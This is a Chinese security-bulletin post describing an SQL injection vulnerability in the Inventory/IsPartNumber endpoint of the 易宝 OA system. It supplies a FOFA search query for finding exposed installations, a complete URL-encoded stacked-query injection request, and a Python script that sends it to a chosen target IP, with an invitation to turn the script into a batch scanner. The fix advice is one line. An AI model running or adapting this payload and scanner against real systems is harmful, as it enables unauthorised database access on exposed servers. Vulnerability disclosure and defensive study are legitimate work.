声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,禁止私自转载,如需转载,请联系作者!!!!
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关!!!!!
漏洞介绍
X宝OA系统是一种专门为企业和机构的日常办公工作提供服务的综合性软件平台,具有信息管理、 流程管理 、知识管理(档案和业务管理)、协同办公等多种功能,Inventory/IsPartNumber接口存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。
影响版本
易宝OA系统漏洞情报
fofa语句
app="易宝OA系统"Poc
GET /SmartTradeScan/Inventory/IsPartNumber?StockRoomID=1&pn=2%27;DECLARE%20@Tqwh%20NVARCHAR(4000);SET%20@Tqwh=(SELECT%20%27qjxbq%27%2b(SELECT%20(CASE%20WHEN%20(8343=8343)%20THEN%20%271%27%20ELSE%20%270%27%20END))%2b%27qxxqq%27);EXEC%20@Tqwh-- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.712.36 Safari/537.36
Poc验证工具
这里给个基础的demo,大佬们自己改成批量就可以了。
import requests# 输入目标IP和URL路径target_ip = "your_target_ip"url_path = "/SmartTradeScan/Inventory/IsPartNumber?StockRoomID=1&pn=2%27;DECLARE%20@Tqwh%20NVARCHAR(4000);SET%20@Tqwh=(SELECT%20%27qjxbq%27%2b(SELECT%20(CASE%20WHEN%20(8343=8343)%20THEN%20%271%27%20ELSE%20%270%27%20END))%2b%27qxxqq%27);EXEC%20@Tqwh--"# 构建完整的URLurl = f"http://{target_ip}{url_path}"# 定义请求头headers = {"User-Agent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)","Accept": "*/*","Connection": "Keep-Alive",}# 发送 GET 请求response = requests.get(url, headers=headers)# 检查响应状态码if response.status_code == 200:print("验证成功")else:print("验证失败")
修复建议
建议及时更新至最新版本!关注我们
原文始发于微信公众号(极星信安):安全情报,X宝OA Inventory/IsPartNumber SQL注入漏洞!!!
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论